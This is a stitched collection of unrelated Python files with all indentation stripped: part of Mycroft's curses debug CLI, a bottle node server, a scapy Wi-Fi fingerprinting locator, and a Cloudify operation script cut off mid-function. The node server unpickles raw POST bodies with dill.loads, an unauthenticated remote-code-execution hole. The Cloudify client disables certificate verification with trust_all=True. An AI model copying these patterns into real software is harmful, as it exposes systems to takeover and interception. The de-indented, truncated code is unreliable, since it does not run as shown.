for txt in reversed(chatlines):
if len(chat_out) >= cy_chat_area:
break
chat_out.insert(0, txt)
idx_chat -= 1
# Output the chat
y = curses.LINES - (2 + cy_chat_area)
for txt in chat_out:
if txt.startswith(">> ") or txt.startswith(" "):
clr = CLR_CHAT_RESP
else:
clr = CLR_CHAT_QUERY
scr.addstr(y, 1, handleNonAscii(txt), clr)
y += 1
if show_gui and curses.COLS > 20 and curses.LINES > 20:
_do_gui(curses.COLS - 20)
# Command line at the bottom
ln = line
if len(line) > 0 and line[0] == ":":
scr.addstr(curses.LINES - 2, 0, "Command ('help' for options):",
CLR_CMDLINE)
scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE)
ln = line[1:]
else:
prompt = "Input (':' for command, Ctrl+C to quit)"
if show_last_key:
prompt += " === keycode: " + last_key
scr.addstr(curses.LINES - 2, 0,
make_titlebar(prompt,
curses.COLS - 1),
CLR_HEADING)
scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING)
_do_meter(cy_chat_area + 2)
scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT)
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def make_titlebar(title, bar_length):
return title + " " + ("=" * (bar_length - 1 - len(title)))
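# e.g. make_titlebar("History", 20) returns "History ============" (the title
# padded with '=' to a total width of 20 characters); values here are illustrative.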
##############################################################################
# Help system
help_struct = [('Log Scrolling shortcuts',
[("Up / Down / PgUp / PgDn",
"scroll thru history"),
("Ctrl+T / Ctrl+PgUp",
"scroll to top of logs (jump to oldest)"),
("Ctrl+B / Ctrl+PgDn",
"scroll to bottom of logs" + "(jump to newest)"),
("Left / Right",
"scroll long lines left/right"),
("Home / End",
"scroll to start/end of long lines")]),
("Query History shortcuts",
[("Ctrl+N / Ctrl+Left",
"previous query"),
("Ctrl+P / Ctrl+Right",
"next query")]),
("General Commands (type ':' to enter command mode)",
[(":quit or :exit",
"exit the program"),
(":meter (show|hide)",
"display the microphone level"),
(":keycode (show|hide)",
"display typed key codes (mainly debugging)"),
(":history (# lines)",
"set size of visible history buffer"),
(":clear",
"flush the logs")]),
("Log Manipulation Commands",
[(":filter 'STR'",
"adds a log filter (optional quotes)"),
(":filter remove 'STR'",
"removes a log filter"),
(":filter (clear|reset)",
"reset filters"),
(":filter (show|list)",
"display current filters"),
(":find 'STR'",
"show logs containing 'str'"),
(":log level (DEBUG|INFO|ERROR)",
"set logging level"),
(":log bus (on|off)",
"control logging of messagebus messages")]),
("Skill Debugging Commands",
[(":skills",
"list installed Skills"),
(":api SKILL",
"show Skill's public API"),
(":activate SKILL",
"activate Skill, e.g. 'activate skill-wiki'"),
(":deactivate SKILL",
"deactivate Skill"),
(":keep SKILL",
"deactivate all Skills except the indicated Skill")])]
help_longest = 0
for s in help_struct:
for ent in s[1]:
help_longest = max(help_longest, len(ent[0]))
HEADER_SIZE = 2
HEADER_FOOTER_SIZE = 4
def num_help_pages():
lines = 0
for section in help_struct:
lines += 3 + len(section[1])
return ceil(lines / (curses.LINES - HEADER_FOOTER_SIZE))
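# e.g. with a 24-line terminal the help_struct above occupies 39 logical lines
# (3 per section for header/separator/spacer plus one per entry, ignoring wrapping),
# so num_help_pages() returns ceil(39 / 20) == 2.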
def do_draw_help(scr):
def render_header():
scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING)
scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING)
def render_help(txt, y_pos, i, first_line, last_line, clr):
if i >= first_line and i < last_line:
scr.addstr(y_pos, 0, txt, clr)
y_pos += 1
return y_pos
def render_footer(page, total):
text = "Page {} of {} [ Any key to continue ]".format(page, total)
scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING)
scr.erase()
render_header()
y = HEADER_SIZE
page = subscreen + 1
# Find first and last taking into account the header and footer
first = subscreen * (curses.LINES - HEADER_FOOTER_SIZE)
last = first + (curses.LINES - HEADER_FOOTER_SIZE)
i = 0
for section in help_struct:
y = render_help(section[0], y, i, first, last, CLR_HEADING)
i += 1
y = render_help("=" * (curses.COLS - 1), y, i, first, last,
CLR_HEADING)
i += 1
for line in section[1]:
words = line[1].split()
ln = line[0].ljust(help_longest + 1)
for w in words:
if len(ln) + 1 + len(w) < curses.COLS:
ln += " " + w
else:
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
ln = " ".ljust(help_longest + 2) + w
y = render_help(ln, y, i, first, last, CLR_CMDLINE)
i += 1
y = render_help(" ", y, i, first, last, CLR_CMDLINE)
i += 1
if i > last:
break
render_footer(page, num_help_pages())
# Curses doesn't actually update the display until refresh() is called
scr.refresh()
def show_help():
global screen_mode
global subscreen
if screen_mode != SCR_HELP:
screen_mode = SCR_HELP
subscreen = 0
set_screen_dirty()
def show_next_help():
global screen_mode
global subscreen
if screen_mode == SCR_HELP:
subscreen += 1
if subscreen >= num_help_pages():
screen_mode = SCR_MAIN
set_screen_dirty()
##############################################################################
# Skill debugging
def show_skills(skills):
"""Show list of loaded Skills in as many column as necessary."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Loaded Skills", CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 0
prepare_page()
col_width = 0
skill_names = sorted(skills.keys())
for skill in skill_names:
if skills[skill]['active']:
color = curses.color_pair(4)
else:
color = curses.color_pair(2)
scr.addstr(row, column, " {}".format(skill), color)
row += 1
col_width = max(col_width, len(skill))
if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]:
column = 0
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 2:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
column += col_width + 2
col_width = 0
if column > curses.COLS - 20:
# End of screen
break
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def show_skill_api(skill, data):
"""Show available help on Skill's API."""
global scr
global screen_mode
if not scr:
return
screen_mode = SCR_SKILLS
row = 2
column = 0
def prepare_page():
global scr
nonlocal row
nonlocal column
scr.erase()
scr.addstr(0, 0, center(25) + "Skill-API for {}".format(skill),
CLR_CMDLINE)
scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE)
row = 2
column = 4
prepare_page()
for key in data:
color = curses.color_pair(4)
scr.addstr(row, column, "{} ({})".format(key, data[key]['type']),
CLR_HEADING)
row += 2
if 'help' in data[key]:
help_text = data[key]['help'].split('\n')
for line in help_text:
scr.addstr(row, column + 2, line, color)
row += 1
row += 2
else:
row += 1
if row == curses.LINES - 5:
scr.addstr(curses.LINES - 1, 0,
center(23) + "Press any key to continue", CLR_HEADING)
scr.refresh()
wait_for_any_key()
prepare_page()
elif row == curses.LINES - 5:
# Reached bottom of screen, start at top and move output to a
# New column
row = 2
scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return",
CLR_HEADING)
scr.refresh()
def center(str_len):
# generate number of characters needed to center a string
# of the given length
return " " * ((curses.COLS - str_len) // 2)
##############################################################################
# Main UI loop
def _get_cmd_param(cmd, keyword):
# Returns parameter to a command. Will de-quote.
# Ex: find 'abc def' returns: abc def
# find abc def returns: abc def
if isinstance(keyword, list):
for w in keyword:
cmd = cmd.replace(w, "").strip()
else:
cmd = cmd.replace(keyword, "").strip()
if not cmd:
return None
last_char = cmd[-1]
if last_char == '"' or last_char == "'":
parts = cmd.split(last_char)
return parts[-2]
else:
parts = cmd.split(" ")
return parts[-1]
def wait_for_any_key():
"""Block until key is pressed.
This works around curses.error that can occur on old versions of ncurses.
"""
while True:
try:
scr.get_wch() # blocks
except curses.error:
# Loop if get_wch throws error
time.sleep(0.05)
else:
break
def handle_cmd(cmd):
global show_meter
global screen_mode
global log_filters
global cy_chat_area
global find_str
global show_last_key
if "show" in cmd and "log" in cmd:
pass
elif "help" in cmd:
show_help()
elif "exit" in cmd or "quit" in cmd:
return 1
elif "keycode" in cmd:
# debugging keyboard
if "hide" in cmd or "off" in cmd:
show_last_key = False
elif "show" in cmd or "on" in cmd:
show_last_key = True
elif "meter" in cmd:
# microphone level meter
if "hide" in cmd or "off" in cmd:
show_meter = False
elif "show" in cmd or "on" in cmd:
show_meter = True
elif "find" in cmd:
find_str = _get_cmd_param(cmd, "find")
rebuild_filtered_log()
elif "filter" in cmd:
if "show" in cmd or "list" in cmd:
# display active filters
add_log_message("Filters: " + str(log_filters))
return
if "reset" in cmd or "clear" in cmd:
log_filters = list(default_log_filters)
else:
# extract last word(s)
param = _get_cmd_param(cmd, "filter")
if param:
if "remove" in cmd and param in log_filters:
log_filters.remove(param)
else:
log_filters.append(param)
rebuild_filtered_log()
add_log_message("Filters: " + str(log_filters))
elif "clear" in cmd:
clear_log()
elif "log" in cmd:
# Control logging behavior in all Mycroft processes
if "level" in cmd:
level = _get_cmd_param(cmd, ["log", "level"])
bus.emit(Message("mycroft.debug.log", data={'level': level}))
elif "bus" in cmd:
state = _get_cmd_param(cmd, ["log", "bus"]).lower()
if state in ["on", "true", "yes"]:
bus.emit(Message("mycroft.debug.log", data={'bus': True}))
elif state in ["off", "false", "no"]:
bus.emit(Message("mycroft.debug.log", data={'bus': False}))
elif "history" in cmd:
# extract last word(s)
lines = int(_get_cmd_param(cmd, "history"))
if not lines or lines < 1:
lines = 1
max_chat_area = curses.LINES - 7
if lines > max_chat_area:
lines = max_chat_area
cy_chat_area = lines
elif "skills" in cmd:
# List loaded Skills
message = bus.wait_for_response(
Message('skillmanager.list'), reply_type='mycroft.skills.list')
if message:
show_skills(message.data)
wait_for_any_key()
screen_mode = SCR_MAIN
set_screen_dirty()
elif "deactivate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.deactivate", data={'skill': s}))
else:
add_log_message('Usage :deactivate SKILL [SKILL2] [...]')
elif "keep" in cmd:
s = cmd.split()
if len(s) > 1:
bus.emit(Message("skillmanager.keep", data={'skill': s[1]}))
else:
add_log_message('Usage :keep SKILL')
elif "activate" in cmd:
skills = cmd.split()[1:]
if len(skills) > 0:
for s in skills:
bus.emit(Message("skillmanager.activate", data={'skill': s}))
else:
add_log_message('Usage :activate SKILL [SKILL2] [...]')
elif "api" in cmd:
parts = cmd.split()
if len(parts) < 2:
return
skill = parts[1]
message = bus.wait_for_response(Message('{}.public_api'.format(skill)))
if message:
show_skill_api(skill, message.data)
scr.get_wch() # blocks
screen_mode = SCR_MAIN
set_screen_dirty()
# TODO: More commands
return 0 # do nothing upon return
def handle_is_connected(msg):
add_log_message("Connected to Messagebus!")
# start_qml_gui(bus, gui_text)
def handle_reconnecting():
add_log_message("Looking for Messagebus websocket...")
def gui_main(stdscr):
global scr
global bus
global line
global log_line_lr_scroll
global longest_visible_line
global find_str
global last_key
global history
global screen_lock
global show_gui
global config
scr = stdscr
init_screen()
scr.keypad(1)
scr.notimeout(True)
bus.on('speak', handle_speak)
bus.on('message', handle_message)
bus.on('recognizer_loop:utterance', handle_utterance)
bus.on('connected', handle_is_connected)
bus.on('reconnecting', handle_reconnecting)
add_log_message("Establishing Mycroft Messagebus connection...")
gui_thread = ScreenDrawThread()
gui_thread.setDaemon(True) # this thread won't prevent prog from exiting
gui_thread.start()
hist_idx = -1 # index, from the bottom
c = 0
try:
while True:
set_screen_dirty()
c = 0
code = 0
try:
if ctrl_c_pressed():
# User hit Ctrl+C. treat same as Ctrl+X
c = 24
else:
# Don't block, this allows us to refresh the screen while
# waiting on initial messagebus connection, etc
scr.timeout(1)
c = scr.get_wch() # unicode char or int for special keys
if c == -1:
continue
except curses.error:
# This happens in odd cases, such as when you Ctrl+Z
# the CLI and then resume. Curses fails on get_wch().
continue
if isinstance(c, int):
code = c
else:
code = ord(c)
# Convert VT100 ESC codes generated by some terminals
if code == 27:
# NOTE: Not sure exactly why, but the screen can get corrupted
# if we draw to the screen while doing a scr.getch(). So
# lock screen updates until the VT100 sequence has been
# completely read.
with screen_lock:
scr.timeout(0)
c1 = -1
start = time.time()
while c1 == -1:
c1 = scr.getch()
if time.time() - start > 1:
break # 1 second timeout waiting for ESC code
c2 = -1
while c2 == -1:
c2 = scr.getch()
if time.time() - start > 1: # 1 second timeout
break # 1 second timeout waiting for ESC code
if c1 == 79 and c2 == 120:
c = curses.KEY_UP
elif c1 == 79 and c2 == 116:
c = curses.KEY_LEFT
elif c1 == 79 and c2 == 114:
c = curses.KEY_DOWN
elif c1 == 79 and c2 == 118:
c = curses.KEY_RIGHT
elif c1 == 79 and c2 == 121:
c = curses.KEY_PPAGE # aka PgUp
elif c1 == 79 and c2 == 115:
c = curses.KEY_NPAGE # aka PgDn
elif c1 == 79 and c2 == 119:
c = curses.KEY_HOME
elif c1 == 79 and c2 == 113:
c = curses.KEY_END
else:
c = c1
if c1 != -1:
last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2)
code = c
else:
last_key = "ESC"
else:
last_key = str(code)
scr.timeout(-1) # resume blocking
if code == 27: # Hitting ESC twice clears the entry line
hist_idx = -1
line = ""
elif c == curses.KEY_RESIZE:
# Generated by Curses when window/screen has been resized
y, x = scr.getmaxyx()
curses.resizeterm(y, x)
# resizeterm() causes another curses.KEY_RESIZE, so
# we need to capture that to prevent a loop of resizes
c = scr.get_wch()
elif screen_mode == SCR_HELP:
# in Help mode, any key goes to next page
show_next_help()
continue
elif c == '\n' or code == 10 or code == 13 or code == 343:
# ENTER sends the typed line to be processed by Mycroft
if line == "":
continue
if line[:1] == ":":
# Lines typed like ":help" are 'commands'
if handle_cmd(line[1:]) == 1:
break
else:
# Treat this as an utterance
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()],
'lang': config.get('lang', 'en-us')},
{'client_name': 'mycroft_cli',
'source': 'debug_cli',
'destination': ["skills"]}
))
hist_idx = -1
line = ""
elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous)
# Move up the history stack
hist_idx = clamp(hist_idx + 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next)
# Move down the history stack
hist_idx = clamp(hist_idx - 1, -1, len(history) - 1)
if hist_idx >= 0:
line = history[len(history) - hist_idx - 1]
else:
line = ""
elif c == curses.KEY_LEFT:
# scroll long log lines left
log_line_lr_scroll += curses.COLS // 4
elif c == curses.KEY_RIGHT:
# scroll long log lines right
log_line_lr_scroll -= curses.COLS // 4
if log_line_lr_scroll < 0:
log_line_lr_scroll = 0
elif c == curses.KEY_HOME:
# HOME scrolls log lines all the way to the start
log_line_lr_scroll = longest_visible_line
elif c == curses.KEY_END:
# END scrolls log lines all the way to the end
log_line_lr_scroll = 0
elif c == curses.KEY_UP:
scroll_log(False, 1)
elif c == curses.KEY_DOWN:
scroll_log(True, 1)
elif c == curses.KEY_NPAGE: # aka PgDn
# PgDn to go down a page in the logs
scroll_log(True)
elif c == curses.KEY_PPAGE: # aka PgUp
# PgUp to go up a page in the logs
scroll_log(False)
elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn
scroll_log(True, max_log_lines)
elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp
scroll_log(False, max_log_lines)
elif code == curses.KEY_BACKSPACE or code == 127:
# Backspace to erase a character in the utterance
line = line[:-1]
elif code == 6: # Ctrl+F (Find)
line = ":find "
elif code == 7: # Ctrl+G (start GUI)
if show_gui is None:
start_qml_gui(bus, gui_text)
show_gui = not show_gui
elif code == 18: # Ctrl+R (Redraw)
scr.erase()
elif code == 24: # Ctrl+X (Exit)
if find_str:
# End the find session
find_str = None
rebuild_filtered_log()
elif line.startswith(":"):
# cancel command mode
line = ""
else:
# exit CLI
break
elif code > 31 and isinstance(c, str):
# Accept typed character in the utterance
line += c
finally:
scr.erase()
scr.refresh()
scr = None
def simple_cli():
global bSimple
bSimple = True
bus.on('speak', handle_speak)
try:
while True:
# Sleep for a while so all the output that results
# from the previous command finishes before we print.
time.sleep(1.5)
print("Input (Ctrl+C to quit):")
line = sys.stdin.readline()
bus.emit(Message("recognizer_loop:utterance",
{'utterances': [line.strip()]},
{'client_name': 'mycroft_simple_cli',
'source': 'debug_cli',
'destination': ["skills"]}))
except KeyboardInterrupt as e:
# User hit Ctrl+C to quit
print("")
except Exception as e:
LOG.exception(e)
event_thread.exit()
sys.exit()
def connect_to_messagebus():
""" Connect to the mycroft messagebus and launch a thread handling the
connection.
Returns: WebsocketClient
"""
bus = MessageBusClient() # Mycroft messagebus connection
event_thread = Thread(target=connect, args=[bus])
event_thread.setDaemon(True)
event_thread.start()
return bus
|
NodeServer.py
|
from bottle import route, run, request
import dill
import threading
node = None
@route('/conf', method='POST')
def put_conf():
data = request.body.read()
conn = data.split(',')
node.set_master(conn[0], int(conn[1]))
print "POST on node server to set master conn {0}:{1}".format(conn[0], conn[1])
@route('/processes/:id', method='GET')
def get_process(id):
print "GET on node server to get process port"
print "process: " + id
print "port: " + str(node.get_process_port(int(id)))
return str(node.get_process_port(int(id)))
@route('/processes', method='POST')
def put_process():
process = dill.loads(request.body.read())
node.add_process(process)
print "POST on node server to add process {0}".format(process.id)
@route('/start', method='POST')
def start():
print "POST on node server to start processes"
node.start()
def run_server(n):
global node
node = n
#run(host='localhost', port=n.port, debug=True)
threading.Thread(target=run, kwargs=dict(host=n.host, port=n.port)).start()
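# Example usage (hypothetical Node object exposing host, port, set_master,
# get_process_port, add_process and start, as assumed by the routes above):
# run_server(my_node) # serve the REST API in a background thread
# POST /conf with body "10.0.0.1,8080" # point this node at its master
# GET /processes/3 # returns the port of process 3 as a string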
|
realtime2.py
|
import re
import os
import kirk
import numpy as n
import time
import pickle
import threading
import thread
import scapy.all as sca
import scapy_ex
import channel_hop
def trimmean(arr, percent):
# Trimmed mean: drop roughly k samples from each end of arr, then average the rest
length = len(arr)
k = int(round(length*(float(percent)/100)/2))
return n.mean(arr[k+1:length-k])
def parsePacket(pkt):
if pkt.haslayer(sca.Dot11):
if pkt.addr2 is not None:
return pkt.addr2, pkt.dBm_AntSignal
return None, None
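# e.g. an 802.11 frame captured from aa:bb:cc:dd:ee:ff at -52 dBm yields
# ('aa:bb:cc:dd:ee:ff', -52); anything else yields (None, None). The dBm_AntSignal
# field is assumed to be provided by the scapy_ex helpers imported above.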
File = kirk.File
width = kirk.width
height = kirk.height
box_size = kirk.box_size
# Start channel hopping
iface = channel_hop.get_mon_iface()
hop = threading.Thread(target=channel_hop.channel_hop, args=[iface])
hop.daemon = True
hop.start()
fingerprint_file = open(r'fingerprint.pkl', 'rb')
fingerprint = pickle.load(fingerprint_file)
fingerprint_file.close()
max_x = 0
max_y = 0
for mac in fingerprint:
if len(fingerprint[mac]) > max_x:
max_x = len(fingerprint[mac])
for x in range(len(fingerprint[mac])):
if len(fingerprint[mac][x]) > max_y:
max_y = len(fingerprint[mac][x])
while 1:
compare = {}
packets = sca.sniff(iface=iface, timeout=1)
for pkt in packets:
mac, strength = parsePacket(pkt)
if mac is not None and strength is not None and strength < 0:
if mac in compare:
compare[mac].append(strength)
else:
arr = []
compare.update({mac:arr})
compare[mac].append(strength)
compare_avg = {}
for mac in compare:
l = compare[mac]
avg = n.mean(l)
#avg = trimmean(l, 80)
compare_avg.update({mac:avg})
guess = []
weight = []
difference = [[None]*max_y for _ in range(max_x)]
for mac in compare_avg:
least = None
location = []
if mac in fingerprint:
for x in range(len(fingerprint[mac])):
for y in range(len(fingerprint[mac][x])):
if fingerprint[mac][x][y] != None:
c = abs(fingerprint[mac][x][y] - compare_avg[mac])
if difference[x][y] != None:
difference[x][y] += c
else:
difference[x][y] = c
final_x = 0
final_y = 0
print difference
for x in range(len(difference)):
for y in range(len(difference[x])):
if difference[x][y] is None:
continue
if difference[final_x][final_y] is None or difference[final_x][final_y] > difference[x][y]:
final_x = x
final_y = y
print(final_x, final_y)
|
_a4c_start.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
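# Illustrative mapping (names are hypothetical): a node property such as
# _a4c_att_ip_address = {'parameters': ['TARGET', 'cloudify.relationships.contained_in', 'ip']}
# redirects reads of this node's 'ip_address' attribute to the 'ip' attribute of its host.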
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
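# e.g. get_nested_attribute(entity, ['cloudify_agent', 'user']) resolves the
# 'cloudify_agent' attribute first and then looks up its 'user' entry.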
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
env_map = {}
env_map['NODE'] = ctx.node.id
env_map['INSTANCE'] = ctx.instance.id
env_map['INSTANCES'] = get_instance_list(ctx.node.id)
env_map['HOST'] = get_host_node_name(ctx.instance)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx)
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
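# Example (values are illustrative): wrapper output such as
# EXPECTED_OUTPUT_port=8080
# done
# is parsed into {'last_output': 'done', 'outputs': {'port': '8080'}}.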
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Output name: {0} value: {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
